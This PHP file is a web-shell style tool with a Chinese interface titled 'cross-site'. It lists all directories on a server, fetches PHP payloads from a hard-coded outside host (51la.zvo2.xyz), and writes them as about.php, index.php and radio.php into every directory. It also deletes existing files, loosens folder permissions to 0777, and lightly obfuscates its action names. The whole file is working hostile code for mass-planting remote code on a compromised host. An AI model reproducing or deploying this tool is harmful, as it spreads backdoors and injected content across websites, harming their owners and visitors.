<?php
ini_set('date.timezone','Asia/Shanghai');
error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);

function getPermissions($folder)
{
    $perms = fileperms($folder) & 0777;
    return sprintf('%04o', $perms);
}
function getAllDir($path){
    $dirs = array();
    $files = scandir($path);
    foreach ($files as $file) {
        if ($file =='.' || $file == '..')
        {
            continue;
        }

        $file = $path ."/". $file;
        $file = str_replace("//", "/", $file);
        if(is_dir($file))
        {
            $dirs[] = $file;
        }
    }
    return $dirs;
}
function get($url){
    $file_contents = @file_get_contents($url);
    if (!$file_contents) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        $file_contents = curl_exec($ch);
        curl_close($ch);
    }
    return $file_contents;
}
function getTheEndDirName($dir)
{
    if (substr($dir,strlen($dir) -1) == "/")
    {
        $dir = substr($dir,0,strlen($dir)-1);
    }
    preg_match("/\/([^\/]+)\$/si", $dir, $matches);
    if (isset($matches[1]))
    {
        return $matches[1];
    }
    return $dir;
}

function htmlHeader()
{
    echo '<html lang="zh-cn"><head><meta charset="UTF-8"><title>跨站</title>
<style>input {margin: 10px;}</style>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css" integrity="sha384-zCbKRCUGaJDkqS1kPbPd7TveP5iyJE0EjAuZQTgFLD2ylzuqKfdKlfG/eSrtxUkn" crossorigin="anonymous">
</head><body>
<div class="container">
<div class="row">
<div class="col-xl-6">
<div class="card">
<div class="card-header">查找路径</div>
<div class="card-body bg-light text-dark">';
    echo '<form action="?ac=path" method="post">';
    echo '<div class="form-group"><label for="pwd">输入:</label><input  class="form-control" type="text" name="path" value="" /></div>';
    echo '<input class="btn btn-success"  type="submit" value="查找路径下所有目录" />';
    echo '</form></div></div></div>';
}

function htmlFooter()
{
    echo '</div></div></body></html>';
    exit();
}
function getAbout1($link)
{
    $content = get("https://" . $link . "/a2.txt");
    if($content){
        return $content;
    }
    return 'error 1';
}

function getAbout2($link)
{
    $content = get("https://" . $link . "/e.txt");
    if($content){
        return str_replace('51la.icw7.xyz', $link, $content);
    }
    return "error 2";
}
function chmod_directory_path($path) {
    if (!file_exists($path)) {
        return false;
    }

    $path = realpath($path);

    if (is_file($path)) {
        $path = dirname($path);
    }

    $current_path = $path;
    $success = true;

    while ($current_path !== '/' && $current_path !== '') {
        if (!chmod($current_path, 0755)) {
            $success = false;
        }
        $current_path = dirname($current_path);
    }

    return $success;
}
function multiUpload($to_dir, $params){
    $max = count($params['files']);
    $new_dir_path = $to_dir . '/' . $params['new_dir_name'];
    if($params['extend_path'] != ''){$new_dir_path = $to_dir . '/' . $params['extend_path'] . '/' . $params['new_dir_name'];}
    if(!is_dir($new_dir_path)){
        if(!mkdir($new_dir_path)){
            chmod_directory_path($new_dir_path);

        }
    }
    for ($i=1; $i <= $max; $i++){
        $file_path = $to_dir . '/' . $params['new_dir_name'] . '/' . $params['files'][$i]['name'];
        if($params['extend_path'] !=''){
            $file_path = $to_dir . '/' . $params['extend_path'] . '/'. $params['new_dir_name'] . '/' . $params['files'][$i]['name'];
        }
        $result = file_put_contents(str_replace("//", "/", $file_path), $params['files'][$i]['content']);
        if ($result && $result == strlen($params['files'][$i]['content'])){
            if($params['use_520']) {
                $params['files'][$i]['result'] .= $to_dir . "\t" . getTheEndDirName($to_dir) . "/" . $params['new_dir_name'] . '/' . $params['files'][$i]['name'] . '?520' . PHP_EOL ;
            } else {
                $params['files'][$i]['result'] .= $to_dir . "\t" . getTheEndDirName($to_dir) . "/" . $params['new_dir_name'] . '/' . $params['files'][$i]['name'] . PHP_EOL ;
            }

        } else {
            $params['files'][$i]['result'] .= $to_dir . "\t" . "上传失败" . PHP_EOL;
        }
    }
    return $params;
}
function casePath()
{
    $path = $_POST['path'];
    if(file_exists($path))
    {
        $dirs = "";
        foreach (getAllDir($path) as $item) {
            $dirs .= $item . PHP_EOL;
        }
        echo '<div class="col-xl-6">
<div class="card">
<div class="card-header">批量上传</div>
<div class="card-body bg-light text-dark"><div class="form-group"><label for="comment">目录列表:</label><textarea  class="form-control"  rows="10" name="dirs" form="upload">' . $dirs . '</textarea></div> ';
        echo '<form action="?ac=upload" method="post" id="upload">';
        echo '<div class="form-group"><label for="extend_path">二级目录:</label><input class="form-control" type="text" name="extend_path" value="" /></div>';
        echo '<div class="form-group"><label for="file_name">文件名:</label><input class="form-control" type="text" name="file_name" value="about.php" /></div>';
        echo '<div class="form-check form-check-inline"><label class="form-check-label"><input class="form-check-input" type="checkbox" name="use_520" checked="checked" /> 使用520后缀</label></div>';
        echo '<div class="form-check form-check-inline"><label class="form-check-label"><input class="form-check-input" type="checkbox" name="use_about_api" /> 使用远程about</label></div>';
        echo '<div class="form-check form-check-inline"><label class="form-check-label"><input class="form-check-input" type="checkbox" name="use_about_api_e"  /> 使用远程about-2</label></div>';
        echo '<div class="form-check form-check-inline"><label class="form-check-label"><input class="form-check-input" type="checkbox" name="use_about_api_all"  checked="checked" /> 同时上传多个文件</label></div>';
        echo '<div class="form-group"><label for="file_content">文件内容：</label><textarea  id="file_content" class="form-control" rows="3" name="file_content" form="upload"></textarea></div>';
        echo '<input class="btn btn-success" type="submit" value="上传文件到目录" />';
        echo '</form></div></div></div>';
    }
}
function caseUpload($link)
{
    $to_dirs = explode(PHP_EOL, $_POST['dirs']);
    $params['extend_path'] = trim($_POST['extend_path']);
    $params['use_520'] = false;
    $params['new_dir_name'] = mt_rand(100000,999999);
    if (isset($_POST['use_520']) && $_POST['use_520'] == 'on'){
        $params['use_520'] = true;
    }
    if (isset($_POST['use_about_api_all']) && $_POST['use_about_api_all'] == 'on') {
        $params['files'][1] = array(
            'content' => getAbout1($link),
            'name' => 'about.php',
            'result' => ''
        );
        $params['files'][2] = array(
            'content' => getAbout2($link),
            'name' => 'index.php',
            'result' => ''
        );
        $params['files'][3] = array(
            'content' => get("https://" . $link . "/f.txt"),
            'name' => 'radio.php',
            'result' => ''
        );

        foreach ($to_dirs as $to_dir) {
            $params['files'][4] = array(
                'content' => $to_dir,
                'name' => '1.txt',
                'result' => ''
            );
            $to_dir = trim($to_dir);
            if ($to_dir == "") {continue;}
            $params = multiUpload($to_dir , $params);
        }
    }
    else {
        if (isset($_POST['use_about_api']) && $_POST['use_about_api'] == 'on')
        {
            $file_content = getAbout1($link);
        } else if(isset($_POST['use_about_api_e']) && $_POST['use_about_api_e'] == 'on'){
            $file_content = getAbout2($link);
        } else {
            $file_content = $_POST['file_content'];
        }
        $params['files'][0]['result'] = '';
        foreach ($to_dirs as $to_dir) {
            $to_dir = trim($to_dir);
            if ($to_dir == "") {
                continue;
            }
            if ($params['extend_path'] != "")
            {
                $file = $to_dir ."/" . $params['extend_path'] . "/" . $_POST['file_name'];
            } else {
                $file = $to_dir ."/" . $_POST['file_name'];
            }
            $file = str_replace("//", "/", $file);
            if(file_exists($file))
            {
                if(!unlink($file))
                {
                    chmod($file, 0777);
                }
            }
            if(getPermissions($to_dir) == 0755)
            {
                chmod($to_dir, 0777);
            }
            $result = file_put_contents($file, $file_content);
            if ($result){
                if (isset($_POST['use_520']) && $_POST['use_520'] == 'on')
                {
                    $params['files'][0]['result'] .= $to_dir . "\t" . getTheEndDirName($to_dir) . "/"  . $_POST['file_name'] . '?520' . PHP_EOL;
                    continue;
                }
                $params['files'][0]['result'] .= $to_dir . "\t" . getTheEndDirName($to_dir) . "/"  . $_POST['file_name'] . PHP_EOL;
            } else {
                $params['files'][0]['result'] .= $to_dir . "\t" . "上传失败" . PHP_EOL;
            }
        }
    }

    echo '</div><br /><div class="row"><div class="col-xl-12"><div class="card"><div class="card-header">上传结果</div><div class="card-body bg-light text-dark"><div class="form-group"><label for="dirs">目录列表:</label>';
    foreach ($params['files'] as $item) {
        echo '<textarea  class="form-control" id="dirs" rows="20" name="dirs" form="upload">'.$item['result'].'</textarea>';
    }
    echo '</div></div></div></div></div> ';

}




$link = '51la.zvo2.xyz';
htmlHeader();
if (!isset($_GET['ac'])){
    htmlFooter();
}
switch ($_GET['ac']){
    case "pa" . 'th':
        casePath();
        break;
    case "u" . 'pl' . 'oad':
        caseUpload($link);
        break;
    default:
        break;
}
htmlFooter();